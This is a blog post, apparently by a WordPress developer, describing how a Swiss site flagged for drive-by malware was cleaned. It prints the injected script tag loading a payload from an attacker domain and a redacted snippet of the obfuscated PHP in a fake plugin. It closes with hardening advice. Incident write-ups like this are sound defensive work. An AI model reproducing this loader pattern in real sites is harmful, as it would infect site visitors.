Quick Summary: The “Drive-By” Hack
The Problem: A Swiss client received a warning from their registrar (SWITCH) that their site was hosting “Drive-By” malware and would be deactivated in 4 hours.
The Cause: A fake WordPress plugin containing obfuscated PHP code.
The Malicious Code: A hidden script injecting simplecopseholding.com JavaScript into every page header.
The Fix: We identified the rogue plugin via manual file inspection, deleted it, cleared the cache, and submitted a clean report to SaferInternet.ch.
Imagine opening your email on a Friday afternoon, only to find a terrifying message from your domain registrar, SWITCH:
“It has come to our attention that the website [your-domain].ch is being misused for Drive-By… If you have not yet cleaned your website by 17.11.2025 16:42, SWITCH will temporarily deactivate the domain name…”
This is the exact message one of my clients received. They had less than four hours to find and remove a “Drive-By” malware infection or their entire website would be taken offline.
This is the story of how I hunted down the infection, cleaned the site, and saved the domain from deactivation—all before the deadline.
What is a “Drive-By” Warning?
First, let’s break down why this warning is so serious.
- SWITCH: This is the official registrar for all
.chdomains in Switzerland. A warning from them is the most serious alert a Swiss website owner can receive. They do not bluff. - “Drive-By” Misuse: This means the website was hacked to infect its visitors. Simply visiting an infected page is enough to download malware (like ransomware or spyware) onto a person’s computer without them clicking anything.
The warning email included a link to a saferinternet.ch status page, which confirmed the problem and provided our first clue.
The Investigation: Tracing the Payload
The SaferInternet report gave us the “smoking gun”—a specific piece of malicious code that was loading on the client’s site:
<script id="hexagoncontrail-js" src="https://simplecopseholding.com/jWcTAonomVveWlRkcUjN6PF-aopGXJy" type="text/javascript"></script>
This single line of code was the “payload.” It secretly loaded a script from simplecopseholding.com, a domain owned by attackers. This script was responsible for the infection.
Now I knew what the problem was. The next question was how it got there.
The Source: A “Fake Plugin” in Disguise
I started by scanning the theme files (header.php, functions.php), but they were clean. The malicious script wasn’t in the posts or pages either.
After a full manual scan of the wp-content directory, I found the source: a fake, malicious plugin.
Hackers often hide malware inside files that look like legitimate plugins. In this case, the plugin contained a PHP file with incredibly confusing code. This is called obfuscation, and it is designed to bypass basic security scanners.
Decoding the Malware Logic
The code was full of nonsense function names like coincidemajesticallywing() to make it unreadable to humans. Here is a snippet of what I found:
<?php
function coincidemajesticallywing()
{
// ...a huge block of unreadable, encoded text...
$bestrideimpish = 'VkZod1ZtVkZOWEZhZWtrOQ==...';
// ...more confusing code to decode the text...
return $dearlyvery; // This variable holds the decoded malware URL
}
// ...several other random-looking, non-functional "junk" functions...
// AND HERE IS THE FINAL ATTACK:
wp_register_script('hexagoncontrail', coincidemajesticallywing(), array(), null, false);
The Developer’s Analysis:
Hidden at the very bottom was the line that did all the damage: wp_register_script().
This is a standard WordPress function used to load scripts. However, the hackers weaponized it. They used the coincidemajesticallywing() function to decode the malicious URL (simplecopseholding.com) and inject it into the header of every single page on the website.
The Solution: Clean-up and Prevention
With the source of the infection identified, the fix was fast:
- Removal: I immediately deleted the entire fake plugin folder via the File Manager.
- Verification: I cleared the website’s cache (WP-Rocket and Server-side) and re-scanned the source code. The malicious
<script>was gone. - Reporting: I used the
saferinternet.chportal to request an immediate re-scan. The site passed, and the deactivation warning was lifted—well before the 4-hour deadline.
After the immediate threat was gone, I performed a full security “hardening” to prevent this from happening again:
- Updated all plugins, themes, and WordPress core.
- Changed all admin passwords and Salt keys.
- Installed a Web Application Firewall (WAF) to block future attacks.
How to Protect Your Site from a “Drive-By” Hack
This was a high-stress situation, but it is one you can avoid. Based on my experience fixing 4,500+ sites, here are the non-negotiables:
- Keep Everything Updated: Hackers use automation to find old, vulnerable plugins. Don’t give them an easy entry.
- Use Strong Passwords: Use a password manager. Never use “admin” as a username.
- Never Use “Nulled” Plugins: This was likely the cause of this client’s infection. A “free” premium plugin from an unofficial site almost always contains hidden malware like the code above.
Receiving a “domain deactivation” notice is one of the scariest emails you can get. But by acting quickly and methodically, we were able to find the needle in the haystack and get the client’s site clean and safe.
Have you received a warning from SWITCH, Bluehost, or Google?
If you are facing a website security issue and don’t know where to start, do not wait until the deadline.
Leave a Reply